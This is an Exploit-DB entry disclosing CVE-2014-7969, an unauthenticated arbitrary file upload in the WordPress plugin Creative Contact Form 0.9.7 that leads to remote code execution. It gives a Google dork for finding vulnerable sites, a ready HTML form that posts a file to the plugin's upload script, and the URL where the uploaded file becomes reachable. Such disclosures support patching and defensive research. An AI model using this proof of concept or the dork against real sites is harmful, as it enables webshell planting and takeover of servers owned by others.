WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload

EDB-ID:

34922

CVE:

2014-7969

EDB Verified:

Author:

Gianni Angelozzi

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2014-10-08

Vulnerable App:

==========================================================
"Creative Contact Form - The Best WordPress Contact Form Builder" -
Arbitrary File Upload

# Author: Gianni Angelozzi
# Date: 08/10/2014
# Remote: Yes
# Vendor Homepage: https://profiles.wordpress.org/creative-solutions-1/
# Software Link: https://wordpress.org/plugins/sexy-contact-form/
# CVE: CVE-2014-7969
# Version: all including latest 0.9.7
# Google Dork: inurl:"wp-content/plugins/sexy-contact-form"

This plugin includes a PHP script to accept file uploads that doesn't
perform any security check, thus allowing unauthenticated remote file
upload, leading to remote code execution. All versions are affected.
Uploaded files are stored with their original file name.
==========================================================
PoC
==========================================================
Trigger a file upload

<form method="POST" action="
http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Then the file is accessible under

http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/files/FILENAME
==========================================================
EOF


Thanks,

Gianni Angelozzi

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services